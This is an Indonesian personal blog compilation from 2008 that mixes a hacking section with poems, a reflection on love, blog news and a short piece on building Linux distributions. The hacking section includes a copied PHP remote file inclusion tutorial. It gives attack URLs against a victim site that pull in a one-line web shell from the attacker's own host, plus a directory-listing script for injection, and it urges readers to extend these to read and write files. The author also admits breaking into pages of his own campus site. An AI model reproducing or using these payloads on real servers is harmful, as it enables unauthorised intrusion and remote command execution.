catatan kecil andex teddy …

rabu, 19 maret 2008 pkl 9.22 AM.
neh aku temuin wktu akses ke hotmail.com, tiba2 direct ke mail.live.com, karna hotmail msh satu atap dgn msn (microsoft).
Server Error in ‘/’ Application.

<!– Web.Config Configuration File –>

<configuration>
<system.web>
<customErrors mode=”Off”/>
</system.web>
</configuration>

<!– Web.Config Configuration File –>

<configuration>
<system.web>
<customErrors mode=”RemoteOnly” defaultRedirect=”mycustompage.htm”/>
</system.web>
</configuration>

screent shotnya : ini dia

Sory, bukannya aku mo h**k kampus sendiri, tp aku cuman mo liat, eh malah bisa masuk. Ini hasilnya :

Lemlit
Dosen
alumni

Tapi aku nggak ngapain2 kok, suer….Jadi bwt adminnya segela diperbaiki, ada vul di webnya.

Add ons Mozilla yg dapat dimanfaatkan sbgt tools h***ck dkk :

1. HackBar [ https://addons.mozilla.org/en-US/firefox/addon/3899 ]
2. FireBug [ https://addons.mozilla.org/en-US/firefox/addon/1843 ]
3. Anonymouser [ https://addons.mozilla.org/en-US/firefox/addon/1415 ]
4. Whois [ https://addons.mozilla.org/en-US/firefox/addon/603 ]
5. Web Developer [ https://addons.mozilla.org/en-US/firefox/addon/60 ]
6. SwitchProxy Tool [https://addons.mozilla.org/en-US/firefox/addon/125]
7. Foxy Proxy [ https://addons.mozilla.org/en-US/firefox/addon/2464 ]
8. Reload Every [https://addons.mozilla.org/en-US/firefox/addon/115]
9. User Agent Switcher [ https://addons.mozilla.org/en-US/firefox/addon/59 ]
10. View Cookies [ https://addons.mozilla.org/en-US/firefox/addon/3587 ]
11. Modify Headers [ https://addons.mozilla.org/en-US/firefox/addon/967 ]
12. TiX Now! [https://addons.mozilla.org/en-US/firefox/addon/3601]
13. Wmlbrowser [ https://addons.mozilla.org/en-US/firefox/addon/62 ]
14. XSSMe [http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi]
15. SQL Inject-me [http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi]
16. Grease Monkey [https://addons.mozilla.org/en-US/firefox/addon/748]

NB : copast from n0c0py

Sudah banyak artikel2 yang membahas PHP injection. Salah satu command yang sering dipergunakan dalam aksi ‘php injection’ adalah ‘ls -al’ untuk melihat isi direktori. Seperti misalnya:
http://www.korban.com/index.php?page=http://www.situsku.com/cmd.txt &?cmd=ls -al

Dimana isi dari http://www.situsku.com/cmd.txt adalah
// begin of cmd.txt
<? passthru($_GET[cmd]); ?>
// end of cmd.txt

Namun, terkadang aksi itu gagal, tidak menghasilkan apapun atau hanya menghasilkan error. Salah satu kemungkinan penyebab kegagalan, fungsi dari passthru di’disable’ oleh sang admin. Tentunya hal ini dilakukan oleh sang admin dengan alasan keamanan. Tapi kita bisa mengakalinya dengan membuat script untuk melihat isi direktori.

Berikut script yang penulis modifikasi dari php manual:

// begining of list.txt
<?php
function lookdir($mydirectory) {
$strdir = array();
chdir($mydirectory);
echo “<br><br>Directory of $mydirectory “;
if($handle = opendir($mydirectory)) {
while (false !== ($file = readdir($handle))) {
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {

// Socket
$info = ’s’;
} elseif (($perms & 0xA000) == 0xA000) {

// Symbolic Link
$info = ‘l’;
} elseif (($perms & 0×8000) == 0×8000) {

// Regular
$info = ‘-’;
} elseif (($perms & 0×6000) == 0×6000) {

// Block special
$info = ‘b’;
} elseif (($perms & 0×4000) == 0×4000) {

// Directory
$info = ‘d’;
if ($file != “.”) {
if ($file != “..”) {
$strdir[] = $mydirectory . $file;//preg_replace(’//./’,’/’,$file);
}
}

//return $strdir;
} elseif (($perms & 0×2000) == 0×2000) {

// Character special
$info = ‘c’;
} elseif (($perms & 0×1000) == 0×1000) {

// FIFO pipe
$info = ‘p’;
} else {

// Unknown
$info = ‘u’;
}

// Owner
$info .= (($perms & 0×0100) ? ‘r’ : ‘-’);
$info .= (($perms & 0×0080) ? ‘w’ : ‘-’);
$info .= (($perms & 0×0040) ?
(($perms & 0×0800) ? ’s’ : ‘x’ ) :
(($perms & 0×0800) ? ‘S’ : ‘-’));

// Group
$info .= (($perms & 0×0020) ? ‘r’ : ‘-’);
$info .= (($perms & 0×0010) ? ‘w’ : ‘-’);
$info .= (($perms & 0×000 ?
(($perms & 0×0400) ? ’s’ : ‘x’ ) :
(($perms & 0×0400) ? ‘S’ : ‘-’));

// World
$info .= (($perms & 0×0004) ? ‘r’ : ‘-’);
$info .= (($perms & 0×0002) ? ‘w’ : ‘-’);
$info .= (($perms & 0×0001) ?
(($perms & 0×0200) ? ‘t’ : ‘x’ ) :
(($perms & 0×0200) ? ‘T’ : ‘-’));

$array_file_owner = posix_getpwuid(fileowner($file));
$array_file_group = posix_getgrgid(filegroup($file));

$info .= ” ” . $array_file_owner[’name’] . ” “;
$info .= $array_file_group[’name’] . ” “;
$info .= filesize($file) . ” “;
$info .= date(”M d Y”,filemtime($file)) . ” “;
$info .= $file;

echo “<br> $info”;
}
closedir($handle);
}
return $strdir;
} // end of function lookdir

$my_working_directory = getcwd();
lookdir($my_working_directory); // atau coba juga lookdir(”.”);

?>
// end of list.txt

Saat kita coba inject dengan menggunakan list.txt, misalnya:
http://www.korban.com/index.php?page=http://www.situsku.com/list.txt

akan menghasilkan isi direktori berikut permissionnya.Tidak rapih memang, tapi tujuan kita untuk melihat isi direktori bisa tercapai. Dengan fungsi fread,frwrite kita juga bisa membaca dan menulis/membuat sebuah file.

Silahkan dikembangkan.

NB:Copast from NN

Udah lama bgt aku nggak pernah ngeblog. Lagi sibuk ma pekerjaan, pulangnya aja sampe mlm2. Malah sabtu-minggu ada kerjaan juga. Waktu jam istirahat kantor, iseng-iseng aja buka blogku, gimana kondisinya, masih adakah ato udah tewas (he..he…serem amat). Ternyata masih idup kok (syukur deh). Aku juga bingung ma blogku, karna aku punya 5 blog (banyak juga yah). Maunya seh, semua blogku tutup diganti dengan web pribadi. Tapi domain ma hostingnya? Perlu biaya……
Setelah pikir sana-sini, akhirnya aku putusin bwt tetapin hanya 3 blogku, pertama http://exnome.wordpress.com , kedua http://exnome.blogspot.com , dan yang terakhir http://andex_teddy.blogs.friendster.com/my_blog/ .
Mulai hari ini, blog-blogku mulai hidup lagi neh. he…he……

Diriku..
Aku harus hidup dengan diriku sendiri, maka
Aku harus pantas untuk dikenali diriku
Aku ingin mampu saat hari-hari berlalu
Selalu memandang langsung diriku;
Aku tak mau berdiri, sampai matahari terbenam,
Dan membenci diriku akibat apa yang kulakukan.
Aku tak mau menyimpan di rak lemari
Segala macam rahasia tentang diriku,
Dan membodohi diri sendiri saat aku datang dan pergi,
Orang macam apa diriku ini sebenarnya
Aku tak mau menghias diriku dengan dusta.
Aku ingin bisa tampil dengan kepala tegak
Aku ingin pantas menerima hormat semua orang;
Dan di sini dalam perjuangan demi ketenaran dan kekayaan,
Aku ingin mampu menyukai diriku.
Aku tak mau memandang diriku dan mengetahui
Bahwa aku pembohong, suka bersandiwara.
Aku tak dapat menyembunyikan diriku sendiri dariku
Aku melihat apa yang tak terlihat orang lain,
Aku tau pa ayang tak diketahui orang lain,
Aku tak akan pernah dapat membodohi diriku, maka
Apa pun yang trejadi aku ingin
Menghormati diriku dan bebas dari rasa bersalah

‘Ku tak mau tertinggal
Kulari secepat-cepatnya,
Tapi kalah lagi.
Padahal seharusnya di kaki.
Aku berjuang ke depan,
tapi tertahan di belakang.
Mengapa terus kulakukan ?
Sebab ku tak mau tertinggal.

Semakin keras ku jatuh,
Semakin tinggi ku kn memantul.
Kukerahkan segalanya,
Dan itulah yang terpenting.
Di tempat pertama,
Diriku jarang berada.
Jadi aku berusaha sekuatnya
‘Ku tak mau tertinggal.

Sebagian mengatakan aku tak bisa,
sebagian mengatakan jangan.
Sebagian menyerah,
Jawabku, tidak.

Semua daya ada disini,
Tersembunyi dalam pikiranku.
Keuletanku, itulah keunggulanku,
‘Ku tak mau tertinggal.

Lakukan yang terbaik setaip saat,
Masa depan segera jadi masa silam.
Semakin kukatakan ini,
Semakin jarang aku menjadi yang terakhir.
Sepanjang aku bertanding,
Kubelajar arti kemenangan.
Satu pelajaran sederhana
Mengalah itu jalan termudah.

Maka setiap malam sebelum tidur,
Kuharap dalam hal kecil aku berhasil.
Esok hari baru,
’Ku tak akan tertinggal.

Bila tanganmu menyentuhnya,
Bila hatimu dag dig dug,
Suaramu bagai tersangkut di tenggorokan,
Itu bukan cinta, tetapi SUKA.

Bila tanganmu tidak dapat berhenti memegang dan menyentuhnya,
Itu bukan cinta tetapi BIRAHI.

Bila kamu menginginkannya karena tahu Ia akan selalu berada di sampingmu,
Itu bukan cinta tetapi KESEPIAN.

Bila kamu menerima pernyataan cintanya Karena kamu tak mau menyakiti hatinya,
Itu bukan cinta tetapi KASIHAN.

Bila kamu bersedia memberikan semua Yang kamu sukai demi dia,
Itu bukan cinta tetapi KEMURAHAN HATI.

Bila kamu bangga dan selalu ingin memamerkannya Kepada semua orang,
Itu bukan cinta tetapi KEMUJURAN.

Bila kamu mengatakan padanya bahwa ia adalah Satu-satunya hal yang kamu pikirkan,
Itu bukan cinta tetapi GOMBAL.

Kamu MENCINTAINYA,
Ketika kamu MENERIMA KESALAHAN DIA,Karena itu adalah bagian dari kepribadiannya.

Ketika kamu RELA MEMBERIKAN HATIMU, DAN KEHIDUPANMU.
Ketika HATIMU TERCABIK BILA IA SEDIH, dan BERBUNGA BILA IA BAHAGIA.
Ketika kamu MENANGIS UNTUK KEPEDIHANNYA Biarpun ia cukup tegar menghadapinya.
Ketika kamu tertarik kepada orang lain,Tetapi kamu masih SETIA bersamanya.

CINTA adalah PENGORBANAN
MENCINTAI berarti MEMBERI DIRI
CINTA adalah KEMATIAN ATAS EGOISME dan EGOSENTRISME
Kadang itu menyakitkan, tetapi itulah harga yang harus dibayar untuk sebuah CINTA…
Semua diatas adalah kata perumpamaan,tapi…

Awal dari cinta adalah membiarkan orang yang kita cintai menjadi dirinya sendiri, dan tidak merubahnya menjadi gambaran yang kita inginkan.Jika tidak, kita hanya mencintai pantulan diri sendiri yang kita temukan di dalam dia..
sumber : neng phiera (my friends)

Makasih atas komentar2nya….
tentang pembuatan distro linux, akan saya usahakan untuk berbagi ilmu and pengalaman. mskipun saya masih belum jago2 bgt ttg pembuatan distro linux…tunggu aja kehadirannya.
coba juga beberapa ttg pembuatan distro linux dalam forum linux.or.id
hdup open source……. !!

Sering kita mengeluh tidak sejahtera,
Sering kita mengeluh kapan kita kaya,
Tetapi kita hanyalah mengeluh,
Dan mengeluh.

Tidak ada perubahan,
Cara bekerja, tidak ada perubahan
Dalam cara berpikir 
Bekerja kita asal – asalan, asal
Melewati waktu, dan asal selesai
Tidak peduli kontribusi apa
Yang sudah kita berikan
Prestasi apa yang telah kita torehkan  Ingatlah, kesuksesan tidak datang
Tiba –tiba, kesejahteraan
Tidak datang dari langit 
Ikhtiar harus disempurnakan,
Niat harus diluruskan Bekerja keras yang diiringi dengan
Bekerja cerdas, bekerja tangkas dan
Bekerja ikhlas adalah rumusnya. 
Marilah menjadi sejahtera dengan bekerja cerdas.

“dikutip dari sebuah buku karangan …. “

Distro linux? Yup, distro linux adalah kernel linux yang ditambah beberapa paket-paket yang dikemas menjadi satu kesatuan, dengan tujuan untuk mempermudah proses distribusinya. Kernel linux dari distro biasanya udah mengalami sedikit perubahan sesuai dengan vendor-vendor distro tersebut. Sedangkan kernel linux yang masih asli disebut dengan vanila kernel ( dpt diambil di http://www.kernel.org ).

          Ada beberapa hal yang perlu diperhatikan dalam pembuatan / pemgembangan distro linux. Pertama, pembuatan distro tersebut harus mempunyai tujuan yang jelas dan spesifik. Kedua, apakah kita membuat distro dengan remastering atau LFS. Ketiga, masalah pemeliharaan distro tersebut dikemudian harinya.

          Mungkin distro linux yang sekarang lagi dibutuhkan banyak orang adalah masalah kemudahan menggunakannya ( interface-nya ). Karena beberapa OS semakin lama semakin mudah dalam pengoperasiaanya. Meskipun masih ada beberapa yang perlu dipertimbangkan hal-hal lainnya, seperti software yang support OS, hardware support, bug-bug, dan patch yang up to date.